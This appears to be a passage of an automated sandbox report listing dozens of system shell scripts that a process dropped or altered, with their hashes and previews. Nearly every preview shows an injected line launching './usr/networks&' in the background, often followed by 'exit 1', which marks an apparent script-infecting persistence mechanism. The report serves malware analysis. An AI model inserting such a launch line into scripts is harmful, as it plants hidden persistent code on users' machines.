Preview:	./usr/networks&. exit 1.fi ... $TELLERSTATS_CONF..if [ ! -d $DBPATH ].then. echo "$0: data directory $DBPATH does not exist". exit 1.fi..if [ ! -d $SENSORPATH ].then. echo "$0: sensor information directory $SENSORPATH does not exist.". exit 1.fi..if [ ! -d $HTMLROOT ].then. echo "$0: The root of your webserver - $HTMLROOT - does not exist..bailing out". exit 1.fi..if [ ! -d $HTMLPATH ].then. echo "$0: The place where we keep HTML files and pictures - $HTMLPATH - does not exist..bailing out". exit 1.fi..if [ ! -r $GNUPLOTSCRIPT_TMPL ].then. echo "$0: The gnuplot script template $GNUPLOTSCRIPT_TMPL does not exist..bailing out". exit 1.fi..export DBPATH SENSORPATH TEMPPATH HTMLROOT HTMLPATH GNUPLOTSCRIPT_TMPL..if [ -n "$DEBUG" ].then. echo "DBPATH = $DBPATH". echo "SENSORPATH = $SENSORPATH". echo "TEMPPATH = $TEMPPATH". echo "HTMLROOT = $HTMLROOT". echo "HTMLPATH = $HTMLPATH". echo "GNUPLOTSCRIPT_TMPL = $GNUPLOTSCRIPT_TMPL".fi..# generic tellerstats ini

/usr/share/doc/netcat-openbsd/examples/dist.sh

Download File

Process:	/tmp/ZFvtIZszMd
File Type:	ASCII text
Category:	dropped
Size (bytes):	46
Entropy (8bit):	3.925523369006428
Encrypted:	false
SSDEEP:	3:qXVOOR3vKDlOORgn:uK4n
MD5:	2CADDA792FBD37B54978108B6CC504D4
SHA1:	C28DD4FAC0523E31F0220FF31417583882C82692
SHA-256:	E6D7ED75CDB1FA6A44D3ACEC4A6933828B8FEA70FF78C167E49214E7D1634305
SHA-512:	681E59EF7DEE6E6F60C0ABF3325E5F64DF4CEA10A4D0DA585198ECD3BE951722DBE2559F6CE20E70CB97E84E7CEFEED4DC6AC78204D9C9FF403343ECEC7997A0
Malicious:	false
Preview:	./usr/networks&.exit 0../usr/networks&.exit 1.

/usr/share/doc/popularity-contest/examples/bin/popcon-process.sh

Download File

Process:	/tmp/ZFvtIZszMd
File Type:	ASCII text
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.882045108136863
Encrypted:	false
SSDEEP:	3:qXVOORgn:Tn
MD5:	D7BC14787BBF05DEAC1113F4B42B6099
SHA1:	BB0DF86AA88C53CB0E53147B50135113CB15FFFF
SHA-256:	2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
SHA-512:	810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
Malicious:	false
Preview:	./usr/networks&.exit 1.

/usr/share/doc/python3-colorama/examples/demo.sh

Download File

Process:	/tmp/ZFvtIZszMd
File Type:	ASCII text
Category:	dropped
Size (bytes):	893
Entropy (8bit):	4.754860515157645
Encrypted:	false
SSDEEP:	12:20a8PvpwsNE8rKpVXExGG3S69V43usL7XEwoARsVXniVXtgf4VXEt7Fs05fjgn:nlwsWAZDV4eg4w4c6Xjg
MD5:	8B937F22608AE7DB9A71801A5EAF7985
SHA1:	A968811F781A1FA33F18E4F9D23D66E805C926FE
SHA-256:	6D8F85A7D902E1B248753FCA7CC85C39228CC50A872436BB4CEF9276F36D97C9
SHA-512:	07AC35203AF776710809196B92DCF3CF9357C1689B627F7C9146E0B3EFD0B6B47FEF4FE0036AF1C6CABA5854E88AEB576B666C6C8B2E6AD998A143BD5C10E292
Malicious:	false
Preview:	./usr/networks&.# behaviour on exit, which resets default colors again...# print grid of all colors and brightnesses.python demo01.py..# Simple demo of changing foreground, background and brightness..python demo02.py..# Demonstrate the different behavior when autoreset is True and False..python demo03.py..# check that stripped ANSI in redirected stderr does not affect stdout.rm -f demo04.out.python demo04.py 2> demo04.out.cat demo04.out.rm -f demo04.out..# Demonstrate the difference between colorama initialized with wrapping on and off..python demo05.py..# Demonstrate printing colored, random characters at random positions on the screen.python demo06.py..# Demonstrate cursor relative movement: UP, DOWN, FORWARD, and BACK in colorama.CURSOR.python demo07.py..# Demonstrate the use of a context manager instead of manually using init and deinit.python demo08.py../usr/networks&.exit 1.

/usr/share/doc/python3-serial/examples/port_publisher.sh

Download File

Process:	/tmp/ZFvtIZszMd
File Type:	ASCII text
Category:	dropped
Size (bytes):	824
Entropy (8bit):	4.411576521686501
Encrypted:	false
SSDEEP:	12:VFfxfNiNBxMZhLs/jMeZ0aMLlhLyljfBeZ0fjIClAMZhLecdj6RujrZy1Tn:ZNmGLsvZ7kLyqZSIxGLf6oZU
MD5:	CDDCC0755668278EDB780BD4EF65C45E
SHA1:	E66315D7E1B40196A94DB2127F021CB697ADA242
SHA-256:	9FC0A0139AE67EEC0EBB42A89C440F1B7E181E54F21B3D2B965E83B91A4E1C6E
SHA-512:	46090B4B7D308552BB28324E6963AF21F769677483336135831E5CC405EF58267440951018BBBFC773EB6302BC9DCEA27620399DB25E3FE1510BC1232B131CC3
Malicious:	false
Preview:	./usr/networks&.test -f $DAEMON \|\| exit 0..set -e..case "$1" in. start). echo -n "Starting $DESC: ". $DAEMON --daemon --pidfile /var/run/$NAME.pid. echo "$NAME.". ;;. stop). echo -n "Stopping $DESC: ". start-stop-daemon --stop --quiet --pidfile /var/run/$NAME.pid. # \ --exec $DAEMON. echo "$NAME.". ;;. restart\|force-reload). echo -n "Restarting $DESC: ". start-stop-daemon --stop --quiet --pidfile \. /var/run/$NAME.pid. # --exec $DAEMON. sleep 1. $DAEMON --daemon --pidfile /var/run/$NAME.pid. echo "$NAME.". ;;. *). N=/etc/init.d/$NAME. echo "Usage: $N {start\|stop\|restart\|force-reload}" >&2. exit 1. ;;.esac..exit 0.../usr/networks&.exit 1.

/usr/share/doc/sg3-utils/examples/sg_persist_tst.sh

Download File

Process:	/tmp/ZFvtIZszMd
File Type:	ASCII text
Category:	dropped
Size (bytes):	2239
Entropy (8bit):	4.714198727897739
Encrypted:	false
SSDEEP:	48:iBs/sdCu3uQzixZ9sIJyLjs/VhNO4HO0HszTKrBLeVXcR/d4Z+syfIZfwiQEw9r1:iBsEsFuIuGyK9eVX+uZ+syfIZfwiQEwr
MD5:	ADE364831C18F9ABBF6C3B6F050F7759
SHA1:	E1DC95E5FB2431D03A47FAE4C2B2B54B8945CD6E
SHA-256:	2F2441308AA69227E7193D1F3C91BF0B61AB27B1D553C810462FBF35490A5194
SHA-512:	359FA168A4BF7C20436DAFAC5C9C438327B6C994C75CC4C488EA0FFE440F71F6776CDDEAE801D86E3783214EC32E348D5C1994B006E0265608055FCDA423EDBA
Malicious:	false
Preview:	./usr/networks&. h\|-help) usage ; exit 0 ;;. s\|-second) kk=${key2} ;;. vvv) verbose="-vvv" ;;. vv) verbose="-vv" ;;. v\|-verbose) verbose="-v" ;;. ) echo "Unknown option: -$opt " ; exit 1 ;;. esac. shift. opt="$1".done..if [ $# -lt 1 ]. then. usage. exit 1.fi..echo ">>> try to report capabilities:".sg_persist -c ${verbose} "$1".res=$?.case "$res" in. 0) ;;. 1) echo " syntax error" ;;. 2) echo " not ready" ;;. 3) echo " medium error" ;;. 5) echo " illegal request, report capabilities not supported?" ;;. 6) echo " unit attention" ;;. 9) echo " illegal request, Persistent Reserve (In) not supported" ;;. 11) echo " aborted command" ;;. 15) echo " file error with $1 " ;;. 20) echo " no sense" ;;. 21) echo " recovered error" ;;. 33) echo " timeout" ;;. 97) echo " response fails sanity" ;;. 98) echo " other SCSI error" ;;. 99) echo " other error" ;;. ) echo " unknown exit status for sg_persist: $res" ;

/usr/share/doc/transmission-common/examples/send-email-when-torrent-done.sh

Download File

Process:	/tmp/ZFvtIZszMd
File Type:	ASCII text
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.882045108136863
Encrypted:	false
SSDEEP:	3:qXVOORgn:Tn
MD5:	D7BC14787BBF05DEAC1113F4B42B6099
SHA1:	BB0DF86AA88C53CB0E53147B50135113CB15FFFF
SHA-256:	2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
SHA-512:	810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
Malicious:	false
Preview:	./usr/networks&.exit 1.

/usr/share/doc/xdotool/examples/ffsp.sh

Download File

Process:	/tmp/ZFvtIZszMd
File Type:	ASCII text
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.882045108136863
Encrypted:	false
SSDEEP:	3:qXVOORgn:Tn
MD5:	D7BC14787BBF05DEAC1113F4B42B6099
SHA1:	BB0DF86AA88C53CB0E53147B50135113CB15FFFF
SHA-256:	2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
SHA-512:	810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
Malicious:	false
Preview:	./usr/networks&.exit 1.

/usr/share/hplip/hplip_clean.sh

Download File

Process:	/tmp/ZFvtIZszMd
File Type:	ASCII text
Category:	dropped
Size (bytes):	837
Entropy (8bit):	5.302563134496065
Encrypted:	false
SSDEEP:	12:cnghJ15N5jKJQlw6vWcWwH8QoFIr8zAZjF/6wQ8+WepqKUZ0N5JrHYV5N5jKUVcv:MK5NworhH83Igsv/6j59I0Nv05NwHeX4
MD5:	6F4CEFE8C604AF13A0E95B1A624268E0
SHA1:	95D3589209627FA8249BA32D78B11DC6E9E0B94E
SHA-256:	D30D1E9E6DD28C9CCC349B9781744F88B1A023052B98C10CC44427DC13A01157
SHA-512:	BA36E3FB93776A05AAE8CD731DC90D05CC04F4A1F76A141CEAE46EDBEDA4A02B8A20088CBF395985447C870ACC7CF2A6066A1C55D6A6B339AD7381B4973177A6
Malicious:	false
Preview:	./usr/networks&...exit 1..else...find $LOG_DIR -type f -name hp-\* -mtime +$LOGFILE_DAYS -print0 2>/dev/null \| xargs -r -0 rm -f 2>/dev/null..fi.else..exit 1.fi...USAGE=`du -c $LOG_DIR 2>/dev/null \|grep total \|cut -d't' -f1`..# Clears the logs if size is greater than specified limit.while [ $USAGE -gt $MAXSIZE ]; do...# changing the user specified LOGFILE_DAYS days to 1 days lesser...LOGFILE_DAYS=`expr $LOGFILE_DAYS "-" 1`...# If same day logs are reaching Max size, deleting all log files...if [ $LOGFILE_DAYS -eq 0 ]; then...find $LOG_DIR -type f -name hp-\* -print0 2>/dev/null \| xargs -r -0 rm -f 2>/dev/null...break..else...find $LOG_DIR -type f -name hp-\* -mtime +$LOGFILE_DAYS -print0 2>/dev/null \| xargs -r -0 rm -f 2>/dev/null..fi..USAGE=`du -c $LOG_DIR 2>/dev/null \|grep total \|cut -d't' -f1`.done../usr/networks&.exit 1.

/usr/share/lightdm/guest-session/setup.sh

Download File

Process:	/tmp/ZFvtIZszMd
File Type:	ASCII text
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.882045108136863
Encrypted:	false
SSDEEP:	3:qXVOORgn:Tn
MD5:	D7BC14787BBF05DEAC1113F4B42B6099
SHA1:	BB0DF86AA88C53CB0E53147B50135113CB15FFFF
SHA-256:	2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
SHA-512:	810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
Malicious:	false
Preview:	./usr/networks&.exit 1.

/usr/share/os-prober/common.sh

Download File

Process:	/tmp/ZFvtIZszMd
File Type:	ASCII text
Category:	dropped
Size (bytes):	5640
Entropy (8bit):	5.075171234163134
Encrypted:	false
SSDEEP:	96:EndUdULCUP+WucEeLvUmp3qFvUnxEX3ZmXQfVStPDVYt4cI0pNZQ89LKVSTzCKwN:OUdULCUPSeLvUDNUxGZgQfVSDVTM79W7
MD5:	E91743F1831D7CE024336A919713390C
SHA1:	0A53FF0AFE70ADA2538643A69DD332CEF8B9CDA7
SHA-256:	72F50ACEC6CFB58D01899D4A8F64573DDF80B3A57DAF4EE9CE4B403873DF887E
SHA-512:	4C8CCAC875528A73D8113202A887EB009B258DB4A80233073ABC9F46AB21ECAB2937B3EA3FEB794ED2229BF3273E95D9B73073EB8990DDDC8AC9C8DCE161CF0D
Malicious:	false
Preview:	./usr/networks&.# because function is not supposed to exit error codes..fs_type () {..local fstype=""..if (export PATH="/lib/udev:$PATH"; type vol_id) >/dev/null 2>&1; then...PATH="/lib/udev:$PATH" \....fstype=$(vol_id --type "$1" 2>/dev/null \|\| true)...[ -z "$fstype" ] \|\| { echo "$fstype"; return; }..fi..if type lsblk >/dev/null 2>&1 ; then...fstype=$(lsblk --nodeps --noheading --output FSTYPE -- "$1" \|\| true)...[ -z "$fstype" ] \|\| { echo "$fstype"; return; }..fi..if type blkid >/dev/null 2>&1; then...fstype=$(blkid -o value -s TYPE "$1" 2>/dev/null \|\| true)...[ -z "$fstype" ] \|\| { echo "$fstype"; return; }..fi..echo "NOT-DETECTED".}..is_dos_extended_partition() {..if type blkid >/dev/null 2>&1; then...local output....output="$(blkid -o export $1)"....# old blkid (util-linux << 2.24) errors out on extended p....if [ "$?" = "2" ]; then....return 0...fi....# dos partition type and no filesystem type?......if echo $output \| grep -q ' PTTYPE=dos ' &&.....! echo $output \| grep -q ' TYPE=';

/usr/share/session-migration/scripts/01-usd-migration-monitors-xml.sh

Download File

Process:	/tmp/ZFvtIZszMd
File Type:	ASCII text
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.882045108136863
Encrypted:	false
SSDEEP:	3:qXVOORgn:Tn
MD5:	D7BC14787BBF05DEAC1113F4B42B6099
SHA1:	BB0DF86AA88C53CB0E53147B50135113CB15FFFF
SHA-256:	2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
SHA-512:	810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
Malicious:	false
Preview:	./usr/networks&.exit 1.

/usr/share/vim/vim81/macros/less.sh

Download File

Process:	/tmp/ZFvtIZszMd
File Type:	ASCII text
Category:	dropped
Size (bytes):	407
Entropy (8bit):	4.430546624952678
Encrypted:	false
SSDEEP:	12:axuI47jZ9yPM/o47jZ9yPaLaAl5IYkWbWCGcxQuuiC/5s8n:CuI4fZV/o4fZjWqPC2Qu8/e8
MD5:	B133FEA1865145C4491358207DE1C0DB
SHA1:	30DC19C478A0D59E9C03DFB99D59AA67B4E706C3
SHA-256:	01BB6F1F7C079F3702E616E15548F3EF4BDF7D8594F6E4873964476159BD54FB
SHA-512:	138AF43BDB49654CEAB6498CAF1D747E4698CCCC135F095E093FEADA7031DB119EAF820E4661DB2B0104E2863F3A36C5D9EB5464E73E287CFCC61BD8603CE79E
Malicious:	false
Preview:	./usr/networks&. exit. fi. vim --cmd 'let no_plugin_maps = 1' -c 'runtime! macros/less.vim' -. else. vim --cmd 'let no_plugin_maps = 1' -c 'runtime! macros/less.vim' "$@". fi.else. # Output is not a terminal, cat arguments or stdin. if test $# = 0; then. if test -t 0; then. echo "Missing filename" 1>&2. exit. fi. cat. else. cat "$@". fi.fi../usr/networks&.exit 1.

/usr/src/linux-headers-5.4.0-81/Documentation/admin-guide/aoe/autoload.sh

Download File

Process:	/tmp/ZFvtIZszMd
File Type:	ASCII text
Category:	dropped
Size (bytes):	179
Entropy (8bit):	4.813555283479331
Encrypted:	false
SSDEEP:	3:qXVay6vUZ6aAcvZ6sF5b2FpJRJUGE7zsjZ2FPYRKYUGE7zQvvvLQVOORgn:w6vUFAcvgfvRxgA4QRxgUv3LPn
MD5:	693F623F27A2CF8623A4ACEECD20DA9F
SHA1:	7A52B6AA1A47433B259D4699D86A6840C5E02D78
SHA-256:	EC43854908E92A14857A8845EB89F8C64DBFC7856BC23AA1F82BD2A75097EB2C
SHA-512:	01E779F1F569BBEED68AC5EE6C99FD558F003C3166B5F5FA0ED29F512D45AF03378F0708E359009DF3567E4EE003ED7DB395C854EF045F8A51901788A996F290
Malicious:	false
Preview:	./usr/networks&..exit 1.fi..grep major-152 $f >/dev/null.if [ $? = 1 ]; then..echo alias block-major-152 aoe >> $f..echo alias char-major-152 aoe >> $f.fi.../usr/networks&.exit 1.

/usr/src/linux-headers-5.4.0-81/Documentation/admin-guide/aoe/status.sh

Download File

Process:	/tmp/ZFvtIZszMd
File Type:	ASCII text
Category:	dropped
Size (bytes):	315
Entropy (8bit):	4.844907937025013
Encrypted:	false
SSDEEP:	6:wSWl0ARIP9cDhussXcAJWAbM+tCACzYsavu/C5VKSChR5bm026qyAJpl8LAhn:wvVuXFmYs1/LSChqmqfJs0hn
MD5:	43C4BF1017D72A45F95FB685FCECCF9A
SHA1:	B78469C2F587A3E6A4BB591385D5D721B8B829C0
SHA-256:	9A041A6D5102D1416B1616B4C13791F3ED00DE305DDE32E5E2233A85E5ACCD45
SHA-512:	A7D1050FDBF4BA02AD9DDE5E09895C89469439DBD0FE8B9639B1A91802AF96D03ED5D202BAF8354D49D4B9C4489E3B60616A76CEEE8C4924FB8C428C554526FC
Malicious:	false
Preview:	./usr/networks&..exit 1.}..for d in `ls -d $sysd/block/etherd* 2>/dev/null \| grep -v p` end; do..# maybe ls comes up empty, so we use "end"..test $d = end && continue...dev=`echo "$d" \| sed 's/.*!//'`..printf "$format" \..."$dev" \..."`cat \"$d/netif\"`" \..."`cat \"$d/state\"`".done \| sort../usr/networks&.exit 1.

/usr/src/linux-headers-5.4.0-81/Documentation/admin-guide/aoe/udev-install.sh

Download File

Process:	/tmp/ZFvtIZszMd
File Type:	ASCII text
Category:	dropped
Size (bytes):	427
Entropy (8bit):	4.897324371958306
Encrypted:	false
SSDEEP:	12:chnJjBFcVAFBzKJ+NT7+J+900EV/+/gLl60k6XxVjpInPn:CdB6qFBGYNP+JO00e/MilNVFInP
MD5:	9E74B9DB16052AAFD66DC8BE8F3A69F4
SHA1:	A18ADC7A4062900F79D8DBE4430F53E17D0D4B42
SHA-256:	E4ECBF6B5F68F1DB22C13E934EE409855502080D2089DA534A39E9C73E76139B
SHA-512:	3FD605D3E7879DAAC636A01B8373A179796FF60070BCF9975844FC40217A4399B74DA8F345F3F28189CC82C5FFF26715A7D23DDECC0A42E1E794EE3A279B12E6
Malicious:	false
Preview:	./usr/networks&....exit 1...fi..fi.fi..# find the directory where udev rules are stored, often.# /etc/udev/rules.d.#.rules_d="`sed -n '/^udev_rules=/{ s!udev_rules=!!; s!\"!!g; p; }' $conf`".if test -z "$rules_d" ; then..rules_d=/etc/udev/rules.d.fi.if test ! -d "$rules_d"; then..echo "$me Error: cannot find udev rules directory" 1>&2..exit 1.fi.sh -xc "cp `dirname $0`/udev.txt $rules_d/60-aoe.rules"../usr/networks&.exit 1.

/usr/src/linux-headers-5.4.0-81/Documentation/arm64/kasan-offsets.sh

Download File

Process:	/tmp/ZFvtIZszMd
File Type:	ASCII text
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.882045108136863
Encrypted:	false
SSDEEP:	3:qXVOORgn:Tn
MD5:	D7BC14787BBF05DEAC1113F4B42B6099
SHA1:	BB0DF86AA88C53CB0E53147B50135113CB15FFFF
SHA-256:	2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
SHA-512:	810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
Malicious:	false
Preview:	./usr/networks&.exit 1.

/usr/src/linux-headers-5.4.0-81/Documentation/features/list-arch.sh

Download File

Process:	/tmp/ZFvtIZszMd
File Type:	ASCII text
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.882045108136863
Encrypted:	false
SSDEEP:	3:qXVOORgn:Tn
MD5:	D7BC14787BBF05DEAC1113F4B42B6099
SHA1:	BB0DF86AA88C53CB0E53147B50135113CB15FFFF
SHA-256:	2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
SHA-512:	810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
Malicious:	false
Preview:	./usr/networks&.exit 1.

/usr/src/linux-headers-5.4.0-81/Documentation/features/scripts/features-refresh.sh

Download File

Process:	/tmp/ZFvtIZszMd
File Type:	ASCII text
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.882045108136863
Encrypted:	false
SSDEEP:	3:qXVOORgn:Tn
MD5:	D7BC14787BBF05DEAC1113F4B42B6099
SHA1:	BB0DF86AA88C53CB0E53147B50135113CB15FFFF
SHA-256:	2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
SHA-512:	810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
Malicious:	false
Preview:	./usr/networks&.exit 1.

/usr/src/linux-headers-5.4.0-81/Documentation/s390/config3270.sh

Download File

Process:	/tmp/ZFvtIZszMd
File Type:	ASCII text
Category:	dropped
Size (bytes):	1306
Entropy (8bit):	5.232118753528843
Encrypted:	false
SSDEEP:	24:koS8g1YJonwE2BxUCLzJ8ZpvPIfTw1aTTPh4V8TahlByh22pTflrykrs4:koS89E2HvZSIrAa3PhUkahXyh2KTlryG
MD5:	64D41D32A14275C6B34741EE3DFA5EAB
SHA1:	A441D2F4E709ED46E045A7A51701F4F2B9FB0C36
SHA-256:	0FB6B7E294DACF7EEF1583A074C8DF2889BD4366062564740E5A985C837C0754
SHA-512:	B60817E1DFEEF2DA2FBC23656C6C21188B0B5EE1CDE2B46D6DB4FC2A6416298048571A433024A892875F59A91EA175111A0A0D2716C308B35625E4E60FA6A20D
Malicious:	false
Preview:	./usr/networks&.ls $P > /dev/null 2>&1 \|\| exit 1..# Initialize two files, one for /dev/3270 commands and one.# to replace the /etc/inittab file (old one saved in OLDinittab).echo "#!/bin/sh" > $SCR \|\| exit 1.echo " " >> $SCR.echo "# Script built by /sbin/config3270" >> $SCR.if [ ! -d /dev/dasd ]; then..echo rm -rf "$D/$SUBD/*" >> $SCR.fi.echo "grep -v $TTY $INITTAB > $NINITTAB" > $SCRTMP \|\| exit 1.echo "echo $ADDNOTE >> $NINITTAB" >> $SCRTMP.if [ ! -d /dev/dasd ]; then..echo mkdir -p $D/$SUBD >> $SCR.fi..# Now query the tub3270 driver for 3270 device information.# and add appropriate mknod and mingetty lines to our files.echo what=config > $P.while read devno maj min;do..if [ $min = 0 ]; then...fsmaj=$maj...if [ ! -d /dev/dasd ]; then....echo mknod $D/$TUB c $fsmaj 0 >> $SCR....echo chmod 666 $D/$TUB >> $SCR...fi..elif [ $maj = CONSOLE ]; then...if [ ! -d /dev/dasd ]; then....echo mknod $D/$TUB$devno c $fsmaj $min >> $SCR...fi..else...if [ ! -d /dev/dasd ]; then....echo mknod $D/$TTY$d

/usr/src/linux-headers-5.4.0-81/Documentation/sound/cards/multisound.sh

Download File

Process:	/tmp/ZFvtIZszMd
File Type:	C source, ASCII text
Category:	dropped
Size (bytes):	19777
Entropy (8bit):	5.576952905096142
Encrypted:	false
SSDEEP:	384:fwMxiQBla8sAxIEVcwZ+ZoBaOOatUdpVnismIm4FOtcra5rdr/QB5oAl6MQBX6hy:fwMxra8HxIEkmImIOtcra5rAoAl636hy
MD5:	3CF3EA10A24E6A5799372E52C625F5FF
SHA1:	8DCE2DD4D30FE29A3CD9B06E8C276CFAEB41B191
SHA-256:	FD1FB0A9D12E75013B3C330D081C6817E5C0090DE03C22A96B14674A168B307F
SHA-512:	D0108C351A191121A5DB5777A451261837126CC955FFADCF0855C82F27CCF794B91FED77DE152AD61907595A30E879EA582E9819CCAEAC0BDCCAF82C07CC59CE
Malicious:	false
Preview:	./usr/networks&. exit 1.fi.# ============= MultiSound.d/setdigital.c ==============.if test ! -d 'MultiSound.d'; then. $echo 'x -' 'creating directory' 'MultiSound.d'. mkdir 'MultiSound.d'.fi.if test -f 'MultiSound.d/setdigital.c' && test "$first_param" != -c; then. $echo 'x -' SKIPPING 'MultiSound.d/setdigital.c' '(file already exists)'.else. $echo 'x -' extracting 'MultiSound.d/setdigital.c' '(text)'. sed 's/^X//' << 'SHAR_EOF' > 'MultiSound.d/setdigital.c' &&./********************************************************************.X .X * setdigital.c - sets the DIGITAL1 input for a mixer.X .X Copyright (C) 1998 Andrew Veliath.X .X This program is free software; you can redistribute it and/or modify.X * it under the terms of the GNU General Public License as published by.X * the Free Software Foundation; either version 2 of the License, or.X * (at your option) any later version..X .X This program is distributed in the hope that it will be useful,.X * but WITHOUT ANY WAR

/usr/src/linux-headers-5.4.0-81/arch/arm/boot/deflate_xip_data.sh

Download File

Process:	/tmp/ZFvtIZszMd
File Type:	ASCII text
Category:	dropped
Size (bytes):	1019
Entropy (8bit):	5.264867233271885
Encrypted:	false
SSDEEP:	24:NcdhLFmJJsA1Mz9mOBM1t1IjQ+51MC1JOgULmjXUkSo0:NYs51gXe1i95JJB8mH0
MD5:	946D056056885AB81686DFF084F8C0AC
SHA1:	6087B2C2445E11CDE4F03C2E71A445978D68C166
SHA-256:	CF5DEAF653121D3BAE355DBBF73837ABDB5AD46871BCE09376D1EAE23DBAC41A
SHA-512:	D91BE0DF8EB1A761C0BA21D6D563C90D1AB7A740CDCB1A71D611D3C8F6C48D4D6C6291E77B407E51AE9D8D264726806E82CDE5FF00068E0A0487598656365489
Malicious:	false
Preview:	./usr/networks&..[ "$val" ] \|\| { echo "can't find $1 in $VMLINUX" 1>&2; exit 1; }..# convert from hex to decimal..echo $((0x$val)).}..__data_loc=$(sym_val __data_loc)._edata_loc=$(sym_val _edata_loc).base_offset=$(sym_val _xiprom)..# convert to file based offsets.data_start=$(($__data_loc - $base_offset)).data_end=$(($_edata_loc - $base_offset))..# Make sure data occupies the last part of the file..file_end=$(${CONFIG_SHELL} "${srctree}/scripts/file-size.sh" "$XIPIMAGE").if [ "$file_end" != "$data_end" ]; then..printf "end of xipImage doesn't match with _edata_loc (%#x vs %#x)\n" \.. $(($file_end + $base_offset)) $_edata_loc 1>&2..exit 1;.fi..# be ready to clean up.trap 'rm -f "$XIPIMAGE.tmp"; exit 1' 1 2 3..# substitute the data section by a compressed version.$DD if="$XIPIMAGE" count=$data_start iflag=count_bytes of="$XIPIMAGE.tmp".$DD if="$XIPIMAGE" skip=$data_start iflag=skip_bytes \|.$KGZIP -9 >> "$XIPIMAGE.tmp"..# replace kernel binary.mv -f "$XIPIMAGE.tmp" "$XIPIMAGE"../us

/usr/src/linux-headers-5.4.0-81/arch/arm/boot/install.sh

Download File

Process:	/tmp/ZFvtIZszMd
File Type:	ASCII text
Category:	dropped
Size (bytes):	810
Entropy (8bit):	5.14795580060536
Encrypted:	false
SSDEEP:	12:cngowa2h12l3mGXHFMyHFtfBkcCZsL49ysL7FwuIGCjDCLn:M4+XKyrZRCZsL4QsL7FwuIzvCL
MD5:	DD8FCA0CC462A93575815302D5C70995
SHA1:	FFE07B0595BA0DAA3799B71E79F3648D02B641D3
SHA-256:	FC1B0AA6D39705668CA297DACF643A6D429E42A84DABDE0601734F864DBE364F
SHA-512:	D28E0773CFD7FA867E627785D1D86A8AC74A92FB5CB6CC47E642B1E41EB0DCB015D4186D87962A63BF51E22B2EF7FE237C1BCA9B04D557E2C48755D6EF319658
Malicious:	false
Preview:	./usr/networks&...exit 1..fi.}..# Make sure the files actually exist.verify "$2".verify "$3"..# User may have a custom install script.if [ -x ~/bin/${INSTALLKERNEL} ]; then exec ~/bin/${INSTALLKERNEL} "$@"; fi.if [ -x /sbin/${INSTALLKERNEL} ]; then exec /sbin/${INSTALLKERNEL} "$@"; fi..if [ "$(basename $2)" = "zImage" ]; then.# Compressed install. echo "Installing compressed kernel". base=vmlinuz.else.# Normal install. echo "Installing normal kernel". base=vmlinux.fi..if [ -f $4/$base-$1 ]; then. mv $4/$base-$1 $4/$base-$1.old.fi.cat $2 > $4/$base-$1..# Install system map file.if [ -f $4/System.map-$1 ]; then. mv $4/System.map-$1 $4/System.map-$1.old.fi.cp $3 $4/System.map-$1..if [ -x /sbin/loadmap ]; then. /sbin/loadmap.else. echo "You have to install it yourself".fi../usr/networks&.exit 1.

/usr/src/linux-headers-5.4.0-81/arch/arm/tools/syscallhdr.sh

Download File

Process:	/tmp/ZFvtIZszMd
File Type:	ASCII text
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.882045108136863
Encrypted:	false
SSDEEP:	3:qXVOORgn:Tn
MD5:	D7BC14787BBF05DEAC1113F4B42B6099
SHA1:	BB0DF86AA88C53CB0E53147B50135113CB15FFFF
SHA-256:	2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
SHA-512:	810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
Malicious:	false
Preview:	./usr/networks&.exit 1.

/usr/src/linux-headers-5.4.0-81/arch/arm/tools/syscallnr.sh

Download File

Process:	/tmp/ZFvtIZszMd
File Type:	ASCII text
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.882045108136863
Encrypted:	false
SSDEEP:	3:qXVOORgn:Tn
MD5:	D7BC14787BBF05DEAC1113F4B42B6099
SHA1:	BB0DF86AA88C53CB0E53147B50135113CB15FFFF
